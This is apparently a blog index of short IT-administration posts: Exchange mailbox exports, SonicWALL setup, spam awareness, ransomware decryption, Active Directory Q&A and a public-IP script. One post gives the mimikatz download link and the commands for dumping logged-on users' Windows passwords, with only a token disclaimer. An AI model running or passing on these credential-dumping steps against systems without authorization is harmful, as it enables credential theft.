Posts

How to Export Mailboxes with Exchange

Image
How to Export Mailboxes with Exchange Server 2010 SP1 Exchange Server 2010 Service Pack 1 introduced a new method for exporting mailboxes called Mailbox Export Requests. This new method replaces the previous Export-Mailbox command. Before we look at how to create a new mailbox export request in Exchange 2010 SP1 there are a few things that you should understand. Firstly, no accounts are granted the rights to export mailboxes by default. You need to Explicitly grant these rights, even to accounts that are organization administrators. Secondly, the mailbox export request is processed by the Client Access server role. Because multiple Client Access servers can exist in a site the request could be processed by any one of them. To ensure that the path to the export PST 􀃖 le is valid for any Client Access server it has to be a UNC path to network share, not a local path. GRANTING USER RIGHTS FOR MAILBOX EXPORTS IN EXCHANGE 2010 SP1 The Fi rst step is to gr

How to get windows logged on users passwords

Image
How to get windows logged on users passwords Download the mimikatz tool from below link https://github.com/gentilkiwi/mimikatz/releases/download/2.1.0-20160922/mimikatz_trunk.zip Extract the zip and select the appropriate windows architecture  Run the below two commands Cmd1 privilege::debug Cmd2  sekurlsa::logonPasswords full You see the password for your computer account Note:-This is for educational purpose only. try at your own risk.

Difference between Online and offline UPS

Image

What is Spam?

Image
What is Spam? Spam is a Irrelevant or unsolicited messages sent over the Internet, typically to large numbers of users, for the purposes of advertising, phishing, spreading Virus, etc. How Spam Mail Look Like? How to Avoid 1.     Always  check the sender  and recipient information of suspicious messages. Spam will typically be sent from falsified email addresses to conceal the real sender, with a number of recipients in the BCC (blind carbon copy) field of the message to hide the large number of recipients. 2.     Don’t open any suspected attachment from the unknown users. Attachment can contain virus which will make your Data (Excel, word, PPT) Corrupted or can be erased. 3.     Important: Never EVER click on a link in an email that you're not absolutely certain is safe. 4.     Never reply to unknown or suspected although the email will say something like,   "reply with unsubscribe in the subject line to be ta

How to Make a Console Cable

Image
How to Make a Console Cable Overview: The console port on the SonicWALL Appliance is used to access the SonicOS Command Line Interface (CLI) via the DB9 -> RJ45 cable. Procedure: The Pin assignments to make a Console cable (rollover cable) to work with sonicwall appliances is follows: RJ-45 to DB-9 Serial Cable Pin Assignments:   How to test: Launch a terminal emulation application that communicates with the serial port connected to the appliance. Use these settings: • 115,200 baud • 8 data bits • no parity • 1 stop bit • no flow control Press Enter/Return. Initial information is displayed followed by a DEVICE NAME> prompt.

Decrypter for Locky and TeslaCrypt ransomwae Virus

Image
How do I clean a TeslaCrypt infection using the ESET TeslaCrypt & locy ransomware decrypter? Your personal files became encrypted and the following information may be displayed in your computer, or in a .txt, .html or .png file ​ our ESET product detects the infection Win32/Filecoder.TeslaCrypt   How to decrypt your files using the ESETTeslaCryptDecryptor.exe tool Details Solution Download the ESETTeslaCryptDecryptor.exe tool and save the file to your Desktop.   Click Start → All Programs → Accessories , right-click Command prompt and then select Run as administrator from the context menu. Windows 8 / 8.1 / 10 users : press the Windows key + Q to search for applications, type Command prompt into the Search field, right-click Command prompt and then select Run as administrator from the context menu.   Type the command cd %userprofile%\Desktop

Google Apps for Work.

Image
Google Apps for Work. Here are three reasons to give it a try: You can get customised email and more with Gmail for work. It helps employees get things done while collaborating more quickly and efficiently. Millions of businesses, large and small, have already made the switch. Get all of these tools in the Google Apps suite for Rs. 150 /user/month. Google Apps for Work. ​ Get a Free trail

What is a common security feature that often relies on a mobile phone to verify an account when logging in?

Image
  ​ What is a common security feature that often relies on a mobile phone to verify an account when logging in? Texting Two-Factor Authentication Mobile Code QR Code Explanation Two-factor authentication (also known as 2FA or 2-Step Verification) is a technology patented in 1984 that enables confirmation of a user's claimed identity by using a combination of two different components. These components are usually a password and username as well as something that only that user would have immediately at hand, like their mobile phone. Using a username and password together with a piece of information that only the user knows makes it harder for potential intruders to gain access and steal that person's personal data or identity.        

IP Address Automation

Image
IP Address Automation Autohotkey Script  UrlDownloadToFile, https://api.ipify.org/ , %temp%\Ip.txt Fileread, Ipaddress, %temp%\Ip.txt Gui, Font, S16 CDefault, Verdana Gui, Add, Text, x12 y49 w100 h30 , Public IP Gui, Add, Edit, x122 y49 w220 h30 vIpaddress, %ipaddress% Gui, Add, Text, x352 y49 w50 h30 vTXT, UP Gui, Add, Text, x12 y89 w100 h30 , Local IP localip:=A_ipaddress1 Gui, Add, Edit, x122 y89 w220 h30 vlocalip,%localip% Gui, Show, x608 y329 h183 w432, Pro_IPCheckerV1 return GuiClose: ExitApp    IP automation links https://wtfismyip.com/text https://api.ipify.org/

Active Directory Q& A

Image
Q: ​What is global catalog and why is it important​ ?  ​ Ans: Global Catalog  Servers contain a partial replica for every object in Active Directory. A  Global Catalog Server is used to find objects in any domain in the forest. Any Domain Controller can be made into a Global Catalog  Server. Q: what does system state backup contain Ans:  The system state contains a number of items: System Registry COM + Database Certificate Services Active Directory SysVol IIS Metabase Some of these items are only included if the specified service is installed (AD, IIS, Certificates). (Details are online. TechNet:  Server 2003/2003R2 . MSDN:  Server 2003/2003R2 .TechNet forums: Server 2008 . MSDN:  Server 2008 and upwards ) If you need to restore a server, you will need this state to recover the registry, or your AD Domain, or IIS sites. You can restore system state to the same server, or another server with identical hardware. Microsoft does not support restor

Find Manufacturer from MAC address

Image
  I ts was very difficult when the IP goes Conflict and we are having only the MAC Address of the conflict system. From find finding MAC address vendor we can have an idea what system would be like For Sharp, Canon, or like Brother we can identify it's for a printer. Matrix like it's for a EPBX system, for Samsung we can think may it will be Mobile or Camera. The Standard for the MAC address is below MA-L: IEEE MAC Address Large (24-bit block size) MA-M: IEEE MAC Address Medium (28-bit block size) MA-S: IEEE MAC Address Small (36-bit block size) OUI24: Organizationally Unique Identifier (24-bit block size) OUI36: Organizationally Unique Identifier (36-bit block size) IAB: Individual Address Blocks (36-bit block size) CID: Company ID Blocks (24-bit block size) EUI48: Extended Unique Identifier (48-bit block size) Helpful link to find out the manufacturer vendor from the MAC address Macvendors.c

India ranked No 4 among countries that clicked on malicious links last year

Image
India ranked No 4 among countries that clicked on malicious links last year Soure: .techradar.com Malicious code or links are available practically everywhere on the internet. Sometimes they're masked so well that users can easily get fooled by it. So it's no surprise that a large number of the users who clicked on the malicious links come from India. A new report by Trend Micro has revealed that Indians rank at No 4 among countries that click on these malicious links the most. The United States is in the first place at 34%, while Japan takes the 2nd spot at 20%. Australia and Taiwan are tied at the third place with about 4% of their users said to be falling prey to malicious links, while India, China, Germany and France are tied for the fourth place at 3%.  Read More..

Configure SNMP in SonicWALL device

Image
Configure SNMP in SonicWALL device Article Applies To: Gen6 SM E10000 series: NSA E10800, NSA E10400, NSA E10200, NSA E10100 Gen6 SM 9000 series: NSA 9600, NSA 9400, NSA 9200 Gen6 NSA Series: NSA 6600, NSA 5600, NSA 4600, NSA 3600, NSA 2600 Gen5 NSA E-Class series: NSA E8510, E8500, NSA E7500, NSA E6500, NSA E5500 Gen5 NSA series: NSA 5000, NSA 4500, NSA 3500, NSA 2400, NSA 2400 MX, NSA 240, NSA 220, NSA 220 /W. NSA 250M, NSA 250M /W. Gen5 TZ Series : TZ 215, TZ 215 W, TZ 210, TZ 210 W,  TZ 205, TZ 205 W, TZ 200, TZ 200 W, TZ 105, TZ 105 W, TZ 100, TZ 100 W Firmware/Software Version: SonicOS   (5.9 & above) and SonicOS (6.1 & above) Services: SNMP Traffic Feature/Application: SNMP (Simple Network Management Protocol) is a network protocol used over User Datagram Protocol (UDP) that allows network administrators to monitor the status of the SonicWALL security appliance and receive notification of critical events as they occur on the network